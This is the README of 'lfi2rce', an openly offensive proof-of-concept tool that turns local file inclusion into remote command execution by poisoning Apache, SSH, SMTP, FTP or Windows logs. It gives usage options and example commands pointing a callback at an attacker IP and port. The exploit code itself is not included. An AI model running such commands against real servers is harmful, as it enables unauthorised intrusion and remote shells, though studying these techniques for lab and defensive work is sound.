Lfi2rce
Local File Inclusion To Remote Command Execution (PoC)
Install / Use
/learn @0bfxgh0st/Lfi2rceREADME
Local File Inclusion To Remote Command Execution (PoC)
lfi2rce - Local File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
Usage python3 lfi2rce -u <lfi vulnerable url> -t <poison type> -r <attacker ip> -p <attacker port>
Options:
-u <url>
-t <poison type>
-r <attacker ip address>
-p <attacker port>
Cookie mode: (lfi2rce via cookies)
--cookie <name>
Override default log paths: (this will follow selected poison type schema)
-l <log file>
Poison types:
apache apache2 log poison (default path: /var/log/apache2/access.log)
ssh ssh log poison (default path: /var/log/auth.log)
smtp smtp log poison (default path: /var/log/mail.log)
ftp ftp log poison (default path: /var/log/vsftpd.log)
windows windows apache log poison (default path: C:/xampp/apache/logs/access.log)
Examples:
python3 lfi2rce -u "http://ghost.server/index.php?file=" -t apache -r 10.0.2.15 -p 1337 -l /var/log/apache2/error.log
python3 lfi2rce -u "http://ghost.server/index.php?page=" -t ssh -r 10.0.2.15 -p 1337
python3 lfi2rce -u "http://ghost.server/index.php?search=" -t smtp -r 10.0.2.15 -p 1337 -l /var/mail/secure/mail.log
python3 lfi2rce -u "http://ghost.server/index.php?search=" -t ftp -r 10.0.2.15 -p 1337
python3 lfi2rce -u "http://ghost.winserver/index.php?s=" -t windows -r 10.0.2.15 -p 1337
python3 lfi2rce -u "http://ghost.server/index.php" -t ftp -r 10.0.2.15 -p 1337 --cookie session
Related Skills
node-connect
351.8kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
110.9kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
351.8kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
351.8kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
